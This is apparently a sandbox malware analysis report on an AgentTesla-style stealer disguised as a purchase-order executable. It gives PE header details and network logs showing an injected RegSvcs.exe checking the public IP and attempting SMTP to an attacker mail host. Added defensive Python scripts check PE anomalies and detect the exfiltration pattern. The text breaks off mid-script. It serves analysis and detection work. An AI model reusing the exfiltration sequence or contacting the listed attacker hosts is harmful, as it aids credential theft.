                                        Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3444
                                        Entropy (8bit):5.011954215267298
                                        Encrypted:false
                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                        MD5:B133A676D139032A27DE3D9619E70091
                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                        Malicious:false
                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):48786
                                        Entropy (8bit):3.5854495362228453
                                        Encrypted:false
                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                        Malicious:false
                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3444
                                        Entropy (8bit):5.011954215267298
                                        Encrypted:false
                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                        MD5:B133A676D139032A27DE3D9619E70091
                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                        Malicious:false
                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):48786
                                        Entropy (8bit):3.5854495362228453
                                        Encrypted:false
                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                        Malicious:false
                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.143847466881891
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:purchase order - PO-011024-201.exe
                                        File size:1'000'960 bytes
                                        MD5:62b9604ff6ce5a82d5270041dcd2f3fe
                                        SHA1:880c5ce3bb2f391b8fa2ff5764ed0dc905c3a9e6
                                        SHA256:e3308f1dd36bd61758447d5c6eb6e90adabc65e1119bbbe78537c3e3b622835c
                                        SHA512:d09e5e215457173260fffa63d0313645146214b720eb4917acb642606022eb0148a2486ede2d7272e06db73ad0431aafda1ebc2a15fa36a759afeda1234e852b
                                        SSDEEP:12288:IB+YbtCIcFevvXu7HIlHEHoeCrhISRGOdv1NIbZVBR2Y1xGcCN74sUV2pIPdI7nV:cQ89lF1RGOd9NsXX2hNzUV2G8RQfk9
                                        TLSH:CE2509F4FEE55B3AF1E1AEF33788E5DE512EE2B205165E796B0467012220D504CB7B22
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9................0..(...........F... ...`....@.. ....................................@................................
                                        Icon Hash:0b33b32764efb303
                                        Entrypoint:0x4f46a6
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0xA98D3912 [Sat Feb 21 15:58:10 2060 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Signature Valid:
                                        Signature Issuer:
                                        Signature Validation Error:
                                        Error Number:
                                        Not Before, Not After
                                          Subject Chain
                                            Version:
                                            Thumbprint MD5:
                                            Thumbprint SHA-1:
                                            Thumbprint SHA-256:
                                            Serial:
Instruction
jmp dword ptr [00402000h]
(the remaining 97 lines of the disassembly window all decode as `add byte ptr [eax], al`, i.e. 00 00 zero padding after the entry stub; the jmp reads the single IAT slot at RVA 0x2000, which holds mscoree.dll!_CorExeMain, the normal native entry of a .NET executable)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xf4653          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xf6000          0x1994        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xf3600          0x2820
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf8000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xf1cc8          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xf26ac       0xf2800   039759a1cb42e8aec384640eb17b9178  False     0.6778612274484536   data       7.154325575878405    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xf6000          0x1994        0x1a00    1b79d6bb09842533d8c118016aa15417  False     0.41841947115384615  data       5.3110445394016965   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xf8000          0xc           0x200     aa48e7c94b7d06c3d85141b2dad6133e  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                                                ZLIB Complexity
RT_ICON        0xf6130  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15118 x 15118 px/m  0.46318011257035646
RT_GROUP_ICON  0xf71d8  0x14    data                                                                                                1.1
RT_VERSION     0xf71ec  0x5bc   data                                                                                                0.26907356948228883
RT_MANIFEST    0xf77a8  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                   0.5489795918367347
(the Language and Country columns are empty for all four resources)
DLL          Import
mscoree.dll  _CorExeMain
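Two of the static fields above deserve a mechanical check rather than a glance: the COFF time stamp 0xA98D3912 decodes to a date in 2060, and the IMAGE_DIRECTORY_ENTRY_SECURITY entry (file offset 0xf3600, size 0x2820) ends at 0xf5e20, past the end of a 1'000'960-byte (0xf4600) file, which is consistent with "Digitally signed: true" sitting next to empty Signature Valid / Issuer fields. The script below is an added example, not Joe Sandbox tooling; it parses the PE header with struct only and runs offline on a constructed header that carries the report's values (the analysis time 2024-07-02 09:47 UTC is taken from the HTTP session timestamps).

```python
"""Sanity-check the COFF TimeDateStamp and the Authenticode (security) data
directory of a PE file. Added example; the header built by build_header() is
constructed from the values the report lists and is not the real sample."""
import struct
from datetime import datetime, timezone

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SECURITY_DIR = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY; its "VirtualAddress" is a raw file offset


def parse_pe_header(data: bytes) -> dict:
    """Read TimeDateStamp and the security data-directory entry from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    timestamp = struct.unpack_from("<I", data, coff + 4)[0]  # COFF: Machine, NumberOfSections, TimeDateStamp
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    dirs = opt + (96 if magic == PE32_MAGIC else 112)  # first data directory
    sec_off, sec_size = struct.unpack_from("<II", data, dirs + 8 * SECURITY_DIR)
    return {"timestamp": timestamp, "security_offset": sec_off, "security_size": sec_size}


def decode_timestamp(ts: int) -> str:
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def timestamp_findings(ts: int, analysis_epoch: int) -> list:
    """A build time later than the moment the file was observed (or zero) cannot be genuine."""
    if ts == 0:
        return ["TimeDateStamp is zero (stripped)"]
    if ts > analysis_epoch:
        return [f"TimeDateStamp {decode_timestamp(ts)} UTC is after the analysis time"]
    return []


def security_findings(off: int, size: int, file_size: int) -> list:
    """The Authenticode blob must lie entirely inside the file, or no verifier can accept it."""
    if off == 0 and size == 0:
        return []  # simply unsigned
    if off + size > file_size:
        return [f"security directory 0x{off:x}+0x{size:x} ends at 0x{off + size:x}, beyond EOF 0x{file_size:x}"]
    return []


def build_header(timestamp: int, sec_off: int, sec_size: int) -> bytes:
    """Constructed minimal PE32 header (DOS stub + COFF + optional header) for testing."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR, sec_off, sec_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


ANALYSIS_EPOCH = int(datetime(2024, 7, 2, 9, 47, tzinfo=timezone.utc).timestamp())
REPORT_FILE_SIZE = 1_000_960  # 0xf4600, from the report


def analyse(data: bytes, file_size: int, analysis_epoch: int) -> list:
    h = parse_pe_header(data)
    return (timestamp_findings(h["timestamp"], analysis_epoch)
            + security_findings(h["security_offset"], h["security_size"], file_size))


def analyse_report_sample() -> list:
    """Run both checks on a header carrying the values the report lists for the sample."""
    return analyse(build_header(0xA98D3912, 0xF3600, 0x2820), REPORT_FILE_SIZE, ANALYSIS_EPOCH)


if __name__ == "__main__":
    for finding in analyse_report_sample():
        print(finding)
```

To use it on a real file, pass `open(path, "rb").read()` and `os.path.getsize(path)` to `analyse()`. Neither finding proves anything on its own (linkers can be told to write any stamp), but a future stamp on a file whose signature blob cannot be read is a cheap, reliable triage signal.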
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jul 2, 2024 11:47:01.912900925 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:01.912950993 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:01.913021088 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:01.925219059 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:01.925256968 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.428308964 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.428383112 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:02.431387901 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:02.431404114 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.431653976 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.471949100 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:02.554505110 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:02.596507072 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.667468071 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.667542934 CEST  443          49734      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:02.667680025 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:02.675296068 CEST  49734        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:03.327841043 CEST  49736        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:04.382519960 CEST  49736        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:06.421648979 CEST  49736        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:08.612477064 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:08.612524033 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:08.612612009 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:08.616813898 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:08.616830111 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.115160942 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.115245104 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:09.117206097 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:09.117223024 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.117526054 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.163788080 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:09.215696096 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:09.256520987 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.334240913 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.334326029 CEST  443          49737      172.67.74.152  192.168.2.4
Jul 2, 2024 11:47:09.334386110 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:09.337656975 CEST  49737        443        192.168.2.4    172.67.74.152
Jul 2, 2024 11:47:09.925762892 CEST  49738        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:10.929411888 CEST  49738        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:12.944992065 CEST  49738        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:16.945058107 CEST  49738        25         192.168.2.4    46.175.148.58
Jul 2, 2024 11:47:24.960661888 CEST  49738        25         192.168.2.4    46.175.148.58
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jul 2, 2024 11:47:01.890801907 CEST  49281        53         192.168.2.4  1.1.1.1
Jul 2, 2024 11:47:01.902121067 CEST  53           49281      1.1.1.1      192.168.2.4
Jul 2, 2024 11:47:03.309288979 CEST  56634        53         192.168.2.4  1.1.1.1
Jul 2, 2024 11:47:03.326658010 CEST  53           56634      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Jul 2, 2024 11:47:01.890801907 CEST  192.168.2.4  1.1.1.1  0x9eee    Standard query (0)  api.ipify.org            A (IP address)  IN (0x0001)  false
Jul 2, 2024 11:47:03.309288979 CEST  192.168.2.4  1.1.1.1  0x366b    Standard query (0)  mail.iaa-airferight.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address        Type            Class        DNS over HTTPS
Jul 2, 2024 11:47:01.902121067 CEST  1.1.1.1    192.168.2.4  0x9eee    No error (0)  api.ipify.org                   172.67.74.152  A (IP address)  IN (0x0001)  false
Jul 2, 2024 11:47:01.902121067 CEST  1.1.1.1    192.168.2.4  0x9eee    No error (0)  api.ipify.org                   104.26.13.205  A (IP address)  IN (0x0001)  false
Jul 2, 2024 11:47:01.902121067 CEST  1.1.1.1    192.168.2.4  0x9eee    No error (0)  api.ipify.org                   104.26.12.205  A (IP address)  IN (0x0001)  false
Jul 2, 2024 11:47:03.326658010 CEST  1.1.1.1    192.168.2.4  0x366b    No error (0)  mail.iaa-airferight.com         46.175.148.58  A (IP address)  IN (0x0001)  false
                                            • api.ipify.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49734        172.67.74.152   443               8136  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2024-07-02 09:47:02 UTC  155                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-07-02 09:47:02 UTC  211                IN         HTTP/1.1 200 OK
    Date: Tue, 02 Jul 2024 09:47:02 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 89cdb64d4d675e61-EWR
2024-07-02 09:47:02 UTC  11                 IN         Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49737        172.67.74.152   443               7988  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                Bytes transferred  Direction  Data
2024-07-02 09:47:09 UTC  155                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-07-02 09:47:09 UTC  211                IN         HTTP/1.1 200 OK
    Date: Tue, 02 Jul 2024 09:47:09 GMT
    Content-Type: text/plain
    Content-Length: 11
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 89cdb676ec6c6a53-EWR
2024-07-02 09:47:09 UTC  11                 IN         Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
    Data Ascii: 8.46.123.33
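The traffic above is the whole AgentTesla exfiltration sequence in miniature: an injected RegSvcs.exe (PIDs 8136 and 7988) fetches the victim's public IP from api.ipify.org over HTTPS and, about 1.4 s later, opens tcp/25 to mail.iaa-airferight.com (46.175.148.58). The second RegSvcs.exe instance does not query DNS again; it reuses the cached answer, so a detection keyed only on the DNS lookup would miss it. The tcp/25 rows show only client-side packets at 1, 2, 4 and 8 s intervals, i.e. SYN retransmits with no reply, so the mail server never answered during analysis and a rule that waits for a completed session would also miss it. The script below is an added example, not part of the report: the events are constructed from the DNS and TCP rows above (times converted from CEST to UTC and truncated to microseconds), and attributing the SMTP connects to PIDs 8136 and 7988 is an assumption, since the report gives PIDs only for the HTTPS sessions.

```python
"""Two rules over process-attributed DNS and network-connect events (the field
shape of Sysmon Event ID 22 / Event ID 3). Added example; EVENTS is constructed
from the report's flows, with the SMTP PIDs assumed."""
from datetime import datetime, timedelta

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
IP_CHECK_HOSTS = {"api.ipify.org", "icanhazip.com", "checkip.amazonaws.com", "ipinfo.io"}
MAIL_PORTS = {25, 465, 587}
# .NET registration utilities that stealers inject into; neither needs the network.
NET_LOLBINS = {"regsvcs.exe", "regasm.exe"}
WINDOW = timedelta(seconds=60)


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def net(time, pid, image, dst_ip, dst_port):
    return {"type": "net", "time": time, "pid": pid, "image": image, "dst_ip": dst_ip, "dst_port": dst_port}


def dns(time, pid, image, query, answer):
    return {"type": "dns", "time": time, "pid": pid, "image": image, "query": query, "answer": answer}


EVENTS = [  # constructed from the report (UTC); SMTP rows attributed to the RegSvcs PIDs by assumption
    dns("2024-07-02 09:47:01.890801", 8136, REGSVCS, "api.ipify.org", "172.67.74.152"),
    net("2024-07-02 09:47:01.912900", 8136, REGSVCS, "172.67.74.152", 443),
    dns("2024-07-02 09:47:03.309288", 8136, REGSVCS, "mail.iaa-airferight.com", "46.175.148.58"),
    net("2024-07-02 09:47:03.327841", 8136, REGSVCS, "46.175.148.58", 25),
    net("2024-07-02 09:47:08.612477", 7988, REGSVCS, "172.67.74.152", 443),  # no new DNS query: cached
    net("2024-07-02 09:47:09.925762", 7988, REGSVCS, "46.175.148.58", 25),
    # control: a mail client talking SMTP without a preceding public-IP check (constructed)
    net("2024-07-02 09:50:00.000000", 4242, r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
        "46.175.148.58", 25),
]


def detect_exfil(events: list) -> list:
    """Return alerts from two rules:
    lolbin_network    - a .NET registration utility opens any outbound connection;
    ipcheck_then_smtp - the same PID contacts a public-IP service (by DNS query, or by
                        connecting to an address any process resolved for one) and then
                        opens a mail port within WINDOW."""
    events = sorted(events, key=lambda e: parse_ts(e["time"]))
    ipcheck_ips = set()   # addresses resolved for IP-check services, shared across PIDs
    last_ipcheck = {}     # pid -> time of that process's most recent IP check
    alerts = []
    for ev in events:
        pid, t = ev["pid"], parse_ts(ev["time"])
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if ev["type"] == "dns":
            if ev["query"] in IP_CHECK_HOSTS:
                ipcheck_ips.add(ev["answer"])
                last_ipcheck[pid] = t
            continue
        dst = f"{ev['dst_ip']}:{ev['dst_port']}"
        if ev["dst_ip"] in ipcheck_ips:
            last_ipcheck[pid] = t
        if image in NET_LOLBINS:
            alerts.append({"rule": "lolbin_network", "pid": pid, "image": image, "dst": dst, "time": ev["time"]})
        if ev["dst_port"] in MAIL_PORTS and pid in last_ipcheck and t - last_ipcheck[pid] <= WINDOW:
            alerts.append({"rule": "ipcheck_then_smtp", "pid": pid, "image": image, "dst": dst,
                           "time": ev["time"],
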